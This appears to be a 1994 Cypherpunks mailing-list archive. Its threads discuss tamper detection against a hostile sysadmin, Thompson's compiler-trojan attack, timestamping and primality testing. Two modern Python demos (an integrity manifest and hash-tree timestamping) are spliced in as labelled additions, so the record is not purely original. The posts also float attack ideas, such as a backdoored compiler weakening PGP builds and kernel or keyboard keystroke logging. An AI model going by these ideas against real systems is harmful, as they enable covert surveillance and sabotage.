Sure, that's the whole point. Any information protection, signatures or timestamps, can simply be replicated. The timestamp algorithm gives you a temporal ordering to distinguish between the two, which signatures don't have.

On the other hand, I'll amplify Matt's point by pointing out that any deployed mechanism to increase the difficulty and cost of information subversion is better than what exists now, which is strictly ad hoc. The integration issues of any public authentication system will be difficult, regardless of the underlying mechanism.

Eric

From eric at remailer.net Tue Dec 27 18:41:01 1994
From: eric at remailer.net (Eric Hughes)
Date: Tue, 27 Dec 94 18:41:01 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <9412281256.ZM11042@wiley.sydney.sgi.com>
Message-ID: <199412280240.SAA02061@largo.remailer.net>

   From: "Ian Farquhar"

re: personal account tripwire

   The problem is that although you can protect the data file of
   hashes (by using a pass phrase to encrypt it), protecting the
   binary which does the checking is rather more difficult.

Why not recompile the binary? All it needs to be is something like md5.c.
Eric

From adam at bwh.harvard.edu Tue Dec 27 19:06:49 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Tue, 27 Dec 94 19:06:49 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <199412280240.SAA02061@largo.remailer.net>
Message-ID: <199412280306.WAA25310@bwh.harvard.edu>

Eric wrote:
| From: "Ian Farquhar"
|
| re: personal account tripwire
|
| The problem is that although you can protect the data file of
| hashes (by using a pass phrase to encrypt it), protecting the
| binary which does the checking is rather more difficult.
|
| Why not recompile the binary? All it needs to be is something like
| md5.c.

Or leave the binary on a floppy (assuming you can access floppies, or some other removable media.) The problem reduces pretty quickly to a variant of trusting trust. root can hack the kernel, the math libraries, your shell, or several other points to make life difficult.

Can you go through a set of steps so convoluted as to catch this? Probably. But in all likelihood, it's easier to get a personal machine on which to store private files.

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From perry at imsi.com Tue Dec 27 19:07:54 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 27 Dec 94 19:07:54 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <199412280240.SAA02061@largo.remailer.net>
Message-ID: <9412280307.AA03703@snark.imsi.com>

Eric Hughes says:
> From: "Ian Farquhar"
>
> re: personal account tripwire
>
> The problem is that although you can protect the data file of
> hashes (by using a pass phrase to encrypt it), protecting the
> binary which does the checking is rather more difficult.
>
> Why not recompile the binary? All it needs to be is something like
> md5.c.

Read Ken Thompson's Turing Award lecture for why that isn't sufficient. It's quite amusing.

Let's face it -- if you are truly paranoid, you have to carry your machine around with you at all times and chain it to you.
It's all a question of threat model. For national security type attacks nothing less than "chain machine to wrist" will do. For stopping a casual attack, much less is needed. It's all in the threat model...

Perry

From ianf at sydney.sgi.com Tue Dec 27 19:08:10 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Tue, 27 Dec 94 19:08:10 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <199412280240.SAA02061@largo.remailer.net>
Message-ID: <9412281357.ZM11227@wiley.sydney.sgi.com>

On Dec 27, 6:40pm, Eric Hughes wrote:
> The problem is that although you can protect the data file of
> hashes (by using a pass phrase to encrypt it), protecting the
> binary which does the checking is rather more difficult.
>
> Why not recompile the binary? All it needs to be is something like
> md5.c.

I take it you mean recompile the binary every time? Because you'd need to have source around to recompile it from, and the attacker could modify that source even more easily than he or she could hack the binary. The idea is to make tampering with the binary detectable.

Ultimately, the aim is to make it too difficult to break and thus cause most people to give up. I am pretty much certain that to make such a system perfectly secure under these conditions is impossible. What I am aiming for, I suppose, is to make sure that there are no trivial attacks which could compromise security. If you've got a system admin who is willing and capable of hacking exec in the kernel, then it's time to move systems. :)

Ian.
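The "data file of hashes" protected by a pass phrase, as discussed in the personal-tripwire messages above, looks like this in Python. This is an added example, not code from any poster: it authenticates the manifest with an HMAC keyed from the pass phrase instead of encrypting it, uses SHA-256 rather than MD5, and every function name is hypothetical. It protects only the data file; the checker and interpreter still run on the host, which is the open problem the thread describes.

```python
"""Added illustration: a pass-phrase-keyed file-integrity manifest."""
import hashlib
import hmac
import json
import os
import tempfile

PBKDF2_ROUNDS = 200_000  # assumed work factor for stretching the pass phrase


def file_digest(path):
    """SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(root):
    """Map every regular file under root (relative path) to its digest."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            found[os.path.relpath(full, root)] = file_digest(full)
    return found


def _key(passphrase, salt):
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, PBKDF2_ROUNDS)


def seal(root, passphrase):
    """Build the manifest and bind it to the pass phrase with an HMAC tag."""
    salt = os.urandom(16)
    body = json.dumps(scan(root), sort_keys=True)
    tag = hmac.new(_key(passphrase, salt), body.encode(), hashlib.sha256).hexdigest()
    return json.dumps({"salt": salt.hex(), "body": body, "tag": tag})


def check(root, passphrase, sealed):
    """Verify the manifest tag first, then compare it with the live files."""
    doc = json.loads(sealed)
    key = _key(passphrase, bytes.fromhex(doc["salt"]))
    expect = hmac.new(key, doc["body"].encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expect, doc["tag"]):
        raise ValueError("manifest tag mismatch: wrong pass phrase or edited manifest")
    old, new = json.loads(doc["body"]), scan(root)
    return {
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        "removed": sorted(p for p in old if p not in new),
        "added": sorted(p for p in new if p not in old),
    }


def demo():
    """Constructed sample files: seal, tamper, then try to forge the manifest."""
    with tempfile.TemporaryDirectory() as root:
        def write(name, data):
            with open(os.path.join(root, name), "w") as fh:
                fh.write(data)

        write(".profile", "PATH=/usr/bin\n")
        write("notes.txt", "meet at noon\n")
        sealed = seal(root, "correct horse")
        clean = check(root, "correct horse", sealed)

        # Someone with write access changes the account's files.
        write(".profile", "PATH=/tmp/other:/usr/bin\n")
        write("extra.sh", "#!/bin/sh\n")
        os.remove(os.path.join(root, "notes.txt"))
        report = check(root, "correct horse", sealed)

        # They also rewrite the manifest to match, but cannot recompute the tag.
        doc = json.loads(sealed)
        doc["body"] = json.dumps(scan(root), sort_keys=True)
        try:
            check(root, "correct horse", json.dumps(doc))
            forged_accepted = True
        except ValueError:
            forged_accepted = False
        return clean, report, forged_accepted


if __name__ == "__main__":
    print(demo())
```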
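For the "Making sure a program gets to the receiver intact" thread above, this added example (not from any poster) shows one way a timestamp root can technically link every individual timestamp: a hash tree per period whose root is chained to the previous period's root. The construction, the class and the function names are assumptions; the thread does not specify a scheme.

```python
"""Added illustration: linked timestamping with a per-period hash tree."""
import hashlib


def H(tag, *parts):
    """Domain-separated SHA-256 over length-prefixed parts."""
    h = hashlib.sha256(tag)
    for p in parts:
        h.update(len(p).to_bytes(4, "big") + p)
    return h.digest()


def merkle(leaves):
    """Return (root, proofs); proofs[i] lists (sibling, sibling_is_left)."""
    if not leaves:
        return H(b"empty"), []
    level = [H(b"leaf", x) for x in leaves]
    groups = [[i] for i in range(len(leaves))]  # leaf indices under each node
    proofs = [[] for _ in leaves]
    while len(level) > 1:
        nxt, nxt_groups = [], []
        for j in range(0, len(level), 2):
            if j + 1 == len(level):  # odd node out is promoted unchanged
                nxt.append(level[j])
                nxt_groups.append(groups[j])
                continue
            for i in groups[j]:
                proofs[i].append((level[j + 1], False))
            for i in groups[j + 1]:
                proofs[i].append((level[j], True))
            nxt.append(H(b"node", level[j], level[j + 1]))
            nxt_groups.append(groups[j] + groups[j + 1])
        level, groups = nxt, nxt_groups
    return level[0], proofs


class TimestampService:
    """Hypothetical service: one published root per closed period."""

    def __init__(self):
        self.tree_roots = []          # Merkle root of each closed period
        self.roots = [H(b"genesis")]  # roots[n] is published after period n
        self.pending = []

    def submit(self, doc_hash):
        self.pending.append(doc_hash)
        return len(self.roots), len(self.pending) - 1  # (period, index)

    def close_period(self):
        tree_root, proofs = merkle(self.pending)
        self.tree_roots.append(tree_root)
        self.roots.append(H(b"link", self.roots[-1], tree_root))
        self.pending = []
        return proofs


def verify(doc_hash, proof, period, roots):
    """Check a document against the widely published root of its period."""
    node = H(b"leaf", doc_hash)
    for sibling, is_left in proof:
        node = H(b"node", sibling, node) if is_left else H(b"node", node, sibling)
    return H(b"link", roots[period - 1], node) == roots[period]


def chain_head(tree_roots):
    """Recompute the latest root from the per-period tree roots."""
    head = H(b"genesis")
    for r in tree_roots:
        head = H(b"link", head, r)
    return head


def demo():
    """Constructed data: an original release, then a later bogus copy."""
    svc = TimestampService()
    original = hashlib.sha256(b"tool-1.0.tar contents").digest()
    bogus = hashlib.sha256(b"tool-1.0.tar contents, altered").digest()
    others = [hashlib.sha256(b"doc %d" % i).digest() for i in range(3)]

    svc.submit(others[0])
    svc.submit(others[1])
    p_orig, i_orig = svc.submit(original)
    proofs1 = svc.close_period()

    p_bogus, i_bogus = svc.submit(bogus)  # the Bad Guy gets a timestamp too
    svc.submit(others[2])
    proofs2 = svc.close_period()

    published = list(svc.roots)
    rewritten = list(svc.tree_roots)
    rewritten[0] = merkle([others[0], others[1], bogus])[0]
    return {
        "original_ok": verify(original, proofs1[i_orig], p_orig, published),
        "bogus_ok": verify(bogus, proofs2[i_bogus], p_bogus, published),
        "original_has_priority": p_orig < p_bogus,
        "proof_swap_rejected": not verify(bogus, proofs1[i_orig], p_orig, published),
        "rewrite_detected": chain_head(rewritten) != published[-1],
    }


if __name__ == "__main__":
    print(demo())
```

Both files verify, which is Eric's point: the period number, not the mere presence of a timestamp, is what distinguishes the original from the later copy.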
From snyderra at dunx1.ocs.drexel.edu Tue Dec 27 19:31:48 1994
From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder)
Date: Tue, 27 Dec 94 19:31:48 PST
Subject: Making sure a program gets to the receiver intact
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

At 12:30 PM 12/28/94, Ian Farquhar wrote:
>The ftpd's that implement the directory-change messages is not a standard
>one, and that functionality has been added to the servers which support it
>(possibly Linux ships with wuftpd, but no commercial version of Unix I know
>does.) The extended servers are very widely available, and although they
>do make ftp so much nicer to administer, they are not as widely deployed as I
>would have expected by now.

BSD/OS, from BSDI, ships with wuarchive's ftpd. Most sites offering any serious quantity of files have a new ftpd, like wuarchive's.

Bob

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

--
Bob Snyder N2KGO                 MIME, PGP, RIPEM mail accepted
snyderra at post.drexel.edu      PGP & RIPEM keys on key servers
When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl.

From prince at alpha.c2.org Tue Dec 27 20:05:42 1994
From: prince at alpha.c2.org (Niccolo di Bernardo Machiavelli)
Date: Tue, 27 Dec 94 20:05:42 PST
Subject: Phil's Plight
Message-ID: <199412280403.UAA22893@infinity.c2.org>

-----BEGIN PGP SIGNED MESSAGE-----

Well fellow Cypherpunks, I am amazed and shocked. One of our own, Phil Zimmermann is in deep shit and it's about to get deeper. As of this date I have seen very little discussion on how we can help him out. The thing that shocks me the most, is that Phil and the PGP development team have laid the basis for a lot of the Cypherpunk tools we take for granted.
And still with all of the distractions and worries that he currently has, he's working on new tools, that I'm sure we will use and implement in various projects. I think Phil deserves better than the silence his plight has received as of late. I know if we put our collective heads together, we can come up with many ways to help him out. Organized fund raisers might be a good way to start, or perhaps a fax campaign to make the media and legislators aware of his situation. The possibilities abound. If we don't take care of our own, who will?

This post might start a flame war. If it does, I do not apologize. At least the topic is being discussed.

Nick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From eric at remailer.net Tue Dec 27 20:52:26 1994
From: eric at remailer.net (Eric Hughes)
Date: Tue, 27 Dec 94 20:52:26 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <9412280307.AA03703@snark.imsi.com>
Message-ID: <199412280452.UAA02244@largo.remailer.net>

   Read Ken Thompson's Turing Award lecture for why that isn't
   sufficient. Its quite amusing.

I'm quite familiar with the work. [For those who aren't, it's about compilers that compile in self-perpetuating bugs from their own source code.]

The question, however, is not one of possibility but timeliness. Attacks against persistent information are easier than attacks against transient information. If the sysadmin is going to go modifying compilers, it's no longer annoyance.
Eric

From eric at remailer.net Tue Dec 27 20:55:04 1994
From: eric at remailer.net (Eric Hughes)
Date: Tue, 27 Dec 94 20:55:04 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <9412281357.ZM11227@wiley.sydney.sgi.com>
Message-ID: <199412280454.UAA02250@largo.remailer.net>

   From: "Ian Farquhar"

   I take it you mean recompile the binary every time? Because you'd need to have source around to recompile it from, and the attacker could modify that source even more easily than he or she could hack the binary.

The idea is to make tampering with the binary detectable. Recompile the binary from newly uploaded source each time. MD5 source isn't more than about 10K long. That's all of a few seconds of upload time.

   I am pretty much certain that to make such a system perfectly secure under these conditions is impossible.

That's right.

Eric

From ianf at sydney.sgi.com Tue Dec 27 21:39:09 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Tue, 27 Dec 94 21:39:09 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <199412280454.UAA02250@largo.remailer.net>
Message-ID: <9412281627.ZM11604@wiley.sydney.sgi.com>

On Dec 27, 8:54pm, Eric Hughes wrote:
> I take it you mean recompile the binary every time? Because you'd
> need to have source around to recompile it from, and the attacker
> could modify that source even more easily than he or she could hack
> the binary.
>
> The idea is to make tampering with the binary detectable.
> Recompile the binary from newly uploaded source each time. MD5 source
> isn't more than about 10K long. That's all of a few seconds of upload
> time.

Irritating, and also insecure (system admin intercepts the upload and replaces it with source of his or her own).

As has been stated, it's a matter of defining a threat model. IMO, the most likely threat is from pass phrase grabbing (from a sniffer, annex box or whatever), which destroys the security of almost all of these schemes.
Modification attacks are possible, although I doubt that the lengths I have described would be useful.

As a serious project, though, a personal version of tripwire would not be a bad cypherpunk project, and possibly a nice testbed for working out some anti-tampering techniques.

> I am pretty much certain that to make such
> a system perfectly secure under these conditions is impossible.
>
> That's right.

Is there a standard proof for this, though? I suspect that there is, but have not discovered it.

Ian.

From eric at remailer.net Tue Dec 27 23:13:16 1994
From: eric at remailer.net (Eric Hughes)
Date: Tue, 27 Dec 94 23:13:16 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <9412281627.ZM11604@wiley.sydney.sgi.com>
Message-ID: <199412280713.XAA02404@largo.remailer.net>

   From: "Ian Farquhar"

   > Recompile the binary from newly uploaded source each time. MD5 source
   > isn't more than about 10K long. That's all of a few seconds of upload
   > time.

   Irritating [...]

??? An upload can be automated, just like any other solution.

   [...] and also insecure (system admin intercepts the upload and replaces it with source of his or her own).

_Every_ solution to this problem is insecure, when it comes down to it. What you asked for is something that makes things more difficult.

Interception can be made quite difficult. Make the "upload" consist of simulating a keyboard typing the source code into emacs. Change the file name each time. Obfuscate the source by redefining variables each time. Pipe the output directly into the compiler; hell, compile straight from stdin!

You can't go about protecting against the modification of binaries by relying upon one of your binaries being better protected than the rest. There's an infinite regress involved here. The solution is to go outside the regress. Recreating the binary from scratch is one way. I'm sure there are others.

   > I am pretty much certain that to make such
   > a system perfectly secure under these conditions is impossible.
   Is there a standard proof for this, though? I suspect that there is, but have not discovered it.

Get the essay that Perry mentioned and start there. Keep in mind that object code can be interpreted in many different ways, only one of them typically expected.

Eric

From jeffb at sware.com Wed Dec 28 06:03:12 1994
From: jeffb at sware.com (Jeff Barber)
Date: Wed, 28 Dec 94 06:03:12 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <199412280713.XAA02404@largo.remailer.net>
Message-ID: <9412281344.AA09514@wombat.sware.com>

Eric Hughes writes:
>
> From: "Ian Farquhar"
>
> > Recompile the binary from newly uploaded source each time. MD5 source
> > isn't more than about 10K long. That's all of a few seconds of upload
> > time.
>
> Irritating [...]
>
> ??? An upload can be automated, just like any other solution.

Then the automated part (script or whatever) simply becomes another piece that needs to be protected.

> You can't go about protecting against the modification of binaries by
> relying upon one of your binaries being better protected than the
> rest. There's an infinite regress involved here. The solution is to
> go outside the regress. Recreating the binary from scratch is one
> way. I'm sure there are others.

No -- in the absence of other measures, recreating the binary from scratch is not such a way. You've merely added the compiler and its associated utilities to your regression list. Nothing is gained -- other than additional irritation and delay.

-- Jeff

From pfarrell at netcom.com Wed Dec 28 06:53:38 1994
From: pfarrell at netcom.com (Pat Farrell)
Date: Wed, 28 Dec 94 06:53:38 PST
Subject: Why I have a 512 bit PGP key
Message-ID: <35603.pfarrell@netcom.com>

eric at remailer.net (Eric Hughes) writes:
>> Read Ken Thompson's Turing Award lecture for why that isn't
>> sufficient. It's quite amusing.
>
> I'm quite familiar with the work. [For those who aren't, it's about
> compilers that compile in self-perpetuating bugs from their own source
> code.]
>
> Get the essay that Perry mentioned and start there. Keep in mind that
> object code can be interpreted in many different ways, only one of
> them typically expected.

I strongly agree with both Perry that it is amusing and with Eric that everyone should read it.

But I see it as more germane than Eric. It is not about arbitrary self perpetuating bugs from source. It is about serious security holes that are self perpetuated by the binaries of the compiler. The compiler ignores its own source and generates security hacked binaries, even when the source looks like it is corrected.

One strongly held belief among lots on this list and in the PGP advocacy world is that the availability of source guarantees security. Thompson's lecture thoroughly dispels that hope, crushing the "guarantee" completely.

Drawing from Thompson, a simple MD5 is not sufficient. You'd have to have multiple compilers, preferably on different cpu architectures, build the tool from source, and compare the results. Then, and only then, could you claim that you were secure.

Of course, this is far too much work to be practical. And this approach is impractical without need to invent a conspiracy between the compiler developers.

Pat

p.s. HappyNewYear!

Pat Farrell Grad Student pfarrell at cs.gmu.edu
Department of Computer Science George Mason University, Fairfax, VA
Public key available via finger #include

From danisch at ira.uka.de Wed Dec 28 07:39:14 1994
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Wed, 28 Dec 94 07:39:14 PST
Subject: Are 2048-bit pgp keys really secure ?
Message-ID: <9412281539.AA20170@elysion.iaks.ira.uka.de>

> There was a paper in the last seven or eight years on this. I believe
> Pomerance was one of the authors. Ask on sci.crypt for details.

Meanwhile I found the Rivest-Article "Finding Four Million Large Random Primes". It is in Proceedings of Crypto 90, not 91. It references some papers of Pomerance.

> Rabin-Miller would be better.
It would be instructive to examine the
> conditional probability that a composite number which fails
> Rabin-Miller passes Fermat. I understand it's vanishingly small.

What is "vanishingly small" ? The chance to break a 1024-bit-key is also vanishingly small. And the keylength is increased to 2048 bit.

Does anyone know how many Carmichael-Numbers exist?

A Carmichael-Number m is a number where

   foreach a : gcd(a,m)=1 => a^(m-1) = 1 mod m

e.g. 561 = 3*11*17

If you found a Carmichael-Number consisting of primes bigger than the primes in your small-numbers-sieve, the Fermat-test won't detect it as a non-prime.

Since Carmichael-Numbers have at least three prime factors, a 2048-bit n would consist of one ~1024-prime and at least three other primes. At least one of them would be smaller than ~340 bit, probably significantly smaller.

Hadmut

From eric at remailer.net Wed Dec 28 07:51:50 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 28 Dec 94 07:51:50 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <9412281344.AA09514@wombat.sware.com>
Message-ID: <199412281551.HAA02892@largo.remailer.net>

   From: Jeff Barber

   > ??? An upload can be automated, just like any other solution.

   Then the automated part (script or whatever) simply becomes another piece that needs to be protected.

There need be no part of the script/etc. that relies upon persistent information on the target machine. You can simulate the whole thing as typing, if need be.

   You've merely added the compiler and its associated utilities to your regression list.

It occurs to me that there's no need even to use the compiler, if you're willing to upload binary images directly. And if you want to use the compiler, the effort involved in making a recognizer for an ever mutating source is not trivial. Variable names can change, parse trees can change, control structures can change.

   Nothing is gained -- other than additional irritation and delay.

Additional cost of subversion is _exactly_ the issue here.
We're not talking about perfect security; that's impossible in this case, and has been acknowledged as impossible. What is at issue is making it difficult for a not-completely-dedicated-to-your-destruction sysadmin to subvert personal files.

Furthermore, the pragmatics of a personal tripwire are that it only needs to indicate failure once. As soon as I found out that my files weren't safe in their place of residence, I'd leave. The practical question should not be one of fighting a running battle with a hostile root; root always wins, period. A useful outcome of this discussion would be a feasible way of detecting the first modification. Almost always this will not be a full-scale effort.

Eric

From eric at remailer.net Wed Dec 28 08:20:02 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 28 Dec 94 08:20:02 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <35603.pfarrell@netcom.com>
Message-ID: <199412281619.IAA02917@largo.remailer.net>

   From: "Pat Farrell"

   >> Read Ken Thompson's Turing Award lecture for why that isn't
   >> sufficient. It's quite amusing.

   But I see it as more germane than Eric. It is not about arbitrary self perpetuating bugs from source. It is about serious security holes that are self perpetuated by the binaries of the compiler.

"Bugs" is shorthand for any arbitrary deviation from nominal source code function. Come on, do you expect a one sentence summary to be accurate in all detail?

   Drawing from Thompson, a simple MD5 is not sufficient.

A single, unchanging, global MD5 source would be insufficient. That's not what I mentioned, but rather a constantly changing MD5 source. One could also change the arbitrary constants in the MD5 source for a "personal MD5".

Here's a summary of these self-perpetuating false compilers. There is an intermediate source code with the arbitrary deviant function expressed. A true compiler compiles this into the false compiler. The arbitrary function includes a recognizer and a payload.
The false compiler recognizes the source code of the true compiler. At this recognition, the corresponding payload is compiled in. The payload includes all the arbitrary deviant function of the intermediate source, including the recognizer. Thus the false compiler will compile itself from the true source.

[This is a summary. I believe Thompson's original work has a full intermediate compiler; this makes the attack easier to perform, but is not essential.]

Any such attack on the compiler requires a recognizer. This is the point of weakness, since recognizing arbitrary function is mighty difficult. The strongest form of the problem is unsolvable; it's a quick corollary from the solution to the halting problem. Practically speaking, however, the problem is more tractable, because the ability to change the source to some arbitrary form is not unconstrained.

You can, however, make recognizing a source _extremely_ difficult. Plus, if you're only interested in finding the first integrity failure, the recognizer has to work on a source which the author of the recognizer hasn't even seen yet!

Even with public source code of a source scrambler available to the recognizer author, the scrambler can use combinatorial explosions to eliminate hooks for recognition. Reordering of parallelism, for example, or creative use of aliasing -- the number of techniques available is huge.

And that's only for a single algorithm. Lots of functions exist that will detect modification. CRC's are a good example; there are _lots_ of primitive polynomials available for making your very own personal CRC checker.

Remember, you only really need to detect the first modification.

Eric

From eric at remailer.net Wed Dec 28 08:26:08 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 28 Dec 94 08:26:08 PST
Subject: Are 2048-bit pgp keys really secure ?
In-Reply-To: <9412281539.AA20170@elysion.iaks.ira.uka.de>
Message-ID: <199412281625.IAA02926@largo.remailer.net>

   From: danisch at ira.uka.de (Hadmut Danisch)

   > Rabin-Miller would be better. It would be instructive to examine the
   > conditional probability that a composite number which fails
   > Rabin-Miller passes Fermat. I understand it's vanishingly small.

   What is "vanishingly small" ?

Small enough to ignore for the practice of "pretty good" security. There are algorithms to prove primality. See Cohen's excellent _A Course in Computational Algebraic Number Theory_, from Springer.

   Does anyone know how many Carmichael-Numbers exist?

An infinite number. This was just proven in the last two years. The density of Carmichael numbers is very small. As I recall, this paper also included Pomerance, but I don't remember if he did the bulk of the work or not.

   If you found a Carmichael-Number consisting of primes bigger than the primes in your small-numbers-sieve, the Fermat-test won't detect it as a non-prime.

Miller-Rabin will, however. Since most of the time generating a modulus has to do with testing composites, the added time for a few more modexp's to do M-R is small. The large effort is that of the authors of the crypto package to implement and debug it.

Eric

From jeffb at sware.com Wed Dec 28 08:40:21 1994
From: jeffb at sware.com (Jeff Barber)
Date: Wed, 28 Dec 94 08:40:21 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <199412281551.HAA02892@largo.remailer.net>
Message-ID: <9412281640.AA09644@wombat.sware.com>

Eric Hughes writes:
> From: Jeff Barber
> Nothing is gained --
> other than additional irritation and delay.
> What is at issue is making it
> difficult for a not-completely-dedicated-to-your-destruction sysadmin
> to subvert personal files.

But you're advocating what are non-trivial measures in an attempt to solve a problem which is not the easiest attack anyway.
You have been arguing that it might be possible to download a new MD5, then modify it in unusual ways to prevent hacking of the local compiler to recognize it. Then, when folks point out other ways to subvert your integrity check, you complain that you're not trying to solve ALL the problems, only a certain subset. I think the subset you've selected is arbitrary and not particularly realistic.

Let's face it, creating the compiler-to-recognize-MD5 is quite a difficult problem, and if I were your system administrator and wanted to obtain access to your files, creating a special compiler version or otherwise attempting to cause your integrity check to fail would be one of the last forms of attack I'd try.

> Furthermore, the pragmatics of a personal tripwire are that it only
> needs to indicate failure once. As soon as I found out that my files
> weren't safe in their place of residence, I'd leave. The practical
> question should not be one of fighting a running battle with a hostile
> root; root always wins, period. A useful outcome of this discussion
> would be a feasible way of detecting the first modification. Almost
> always this will not be a full-scale effort.

I agree that would be useful. But the problem with this whole argument is that the number of things whose modification you need to detect is large and their detection is non-trivial. One of the easiest ways to subvert your security is simply to record your keystrokes. It doesn't take a rocket scientist to hack your kernel (or whatever it's called on your OS) to do this. And how do you detect it? The original kernel can be restored after booting with a hacked kernel so you can't use modification times. Perhaps you can then detect that the system was rebooted? Well, maybe, but hiding that is not so difficult either, and a reboot may not necessarily seem suspicious in any case.

The bottom line is that, as an ordinary user, you are relying completely on your trust in the system administrator.
-- Jeff

From danisch at ira.uka.de Wed Dec 28 09:08:00 1994
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Wed, 28 Dec 94 09:08:00 PST
Subject: Why I have a 512 bit PGP key
Message-ID: <9412281707.AA20289@elysion.iaks.ira.uka.de>

> Let's face it, creating the compiler-to-recognize-MD5 is quite a difficult
> problem, and if I were your system administrator and wanted to obtain
> access to your files, creating a special compiler version or otherwise
> attempting to cause your integrity check to fail would be one of the last
> forms of attack I'd try.

Who says that your attacker is your admin?

Is anybody here who ever checked the source of the gcc compiler? Why not modify the gcc to make it compile specific crypto software (e.g. pgp) wrong, smuggling in any weakness? Everyone checks the pgp signatures after receiving a new version (do you?). Who checks the gcc ? Who checks the SunOS-cc ?

If the government wants to attack software like pgp it would be easier to modify compilers than modifying the crypto sources.

> One of the easiest ways to
> subvert your security is simply to record your keystrokes. It doesn't
> take a rocket scientist to hack your kernel (or whatever it's called on
> your OS) to do this. And how do you detect it?

Why not build keyboards with 4MByte RAM ? Let him use any OS he wants to use. Read out the keyboard at night by room-cleaning staff or by any program able to communicate in a network.

Hadmut

From david.lloyd-jones at canrem.com Wed Dec 28 10:18:34 1994
From: david.lloyd-jones at canrem.com (David Lloyd-Jones)
Date: Wed, 28 Dec 94 10:18:34 PST
Subject: MILTON ON CSPAN
In-Reply-To: <199412261450.GAA25182@kiwi.CS.Berkeley.EDU>
Message-ID: <60.18079.6525.0C1C5F30@canrem.com>

Adam Shostack sez:

AM+| if you have cable, Milton Friedman will be discussing Hayek on CSPAN
  +| (I'm not sure whether I or II, I think I) this Wednesday at 8.
On behalf of the Second International may I comment, without seeing the show, but having read most of their books?

As far as Friedman and Schwartz are concerned they have made a good career out of a simple insight, "inflation is always and everywhere a monetary phenomenon". When I was two and three years old being pulled around in a sled as my parents organised the socialist revolution (during the war this consisted of voting for the Commonwealth Party and opposing the Communists; Conservative and Labour, the government, were both so hated they were not in the game...) I was always told that inflation was too much money chasing too few goods. Hmmm....

When I grew up I met people who had been two cells over from Hayek in their filthy Austrian jail. Hayek kept on muttering: socialism leads to fascism, socialism leads to fascism, return to previous two clauses and repeat...

Social democrats, including my friend just down the corridor from Hayek, thought that fascism resulted from chaos, stupidity, and lack of social organisation. I support the Lions Club to this day, sing Bingo for the Catholics; I support every farm co-op, not because I think their economics is sound but because I think that neighbours working together is something to be supported every time you see it.

* * *

What Milton says about Hayek on television will probably be clean, appealing, rational, and clear to the minds of the very young. Limited, however, in its use.

-dlj.

david.lloyd-jones at canrem.com
* 1st 1.11 #3818 * A piano is a piano is a piano. -- Gertrude Steinway

From david.lloyd-jones at canrem.com Wed Dec 28 10:18:50 1994
From: david.lloyd-jones at canrem.com (David Lloyd-Jones)
Date: Wed, 28 Dec 94 10:18:50 PST
Subject: good blaze quote
In-Reply-To:
Message-ID: <60.18078.6525.0C1C5F2F@canrem.com>

DD+I have a flawless philosophic/scientific model of reality.
  +Unfortunately, it's actual size.

So far you're doin' fine.
DD+>Cypherpunks write code, and design protocols, and analyze ciphers, and
  +>assess risks, and write articles, and attend conferences, and lobby
  +>Congress, and in general look at the world with a critical eye.

Actually real punks hack whole systems, so we go out and run Congress, (me) or Japanese science (my ex-wife) or the CIA and State Department in Africa (the woman I am about to marry).

Everything you say about writing code, designing protocols, analysing ciphers and assessing risks (also writing articles and attending conferences) is pretty much correct. It also helps to sleep with the right women at times, a point which seems to escape the essentially male computer-freek culture. Good table manners and a certain amount of familiarity with other languages help; my next wife, for instance, is only mine because I can say "ayin l'gazal", eyes like a gazelle's, something I must have picked up while sussing out your local bunch of AK-47 carrying terrorists -- or half-starved recent Canadian immigrants, whichever story you care to believe.

I have to leave now: I am about to be visited by my neighborhood sociopath, a guy who works for Steve Wynn and all those folks in Las Vegas. He has a new and interesting story to tell me. I've heard it all before. But it's going to be interesting to hear the latest version.

-dlj.

david.lloyd-jones at canrem.com
* 1st 1.11 #3818 * Who won't do the arithmetic will live by stupid policies.

From cort at ecn.purdue.edu Wed Dec 28 10:20:39 1994
From: cort at ecn.purdue.edu (cort)
Date: Wed, 28 Dec 94 10:20:39 PST
Subject: recognizing the essence
Message-ID: <199412281820.NAA15426@en.ecn.purdue.edu>

Eric and Co. were discussing the "hiding" (obfuscating?) of source code. I am interested in identifying source code (similarities).

I would like to review literature and available programs for recognizing plagiarism (of computer source code). (There is potential for a law suit in this case.)
I have heard of computer science professors using such programs to thwart would-be cheaters on class programming assignments. From what I remember these were probabilistic. n% likeness gives m% probability of cheating, etc.

Does anyone have pointers for me?

Cort.

From jamesd at netcom.com Wed Dec 28 11:48:59 1994
From: jamesd at netcom.com (James A. Donald)
Date: Wed, 28 Dec 94 11:48:59 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <9412281707.AA20289@elysion.iaks.ira.uka.de>
Message-ID:

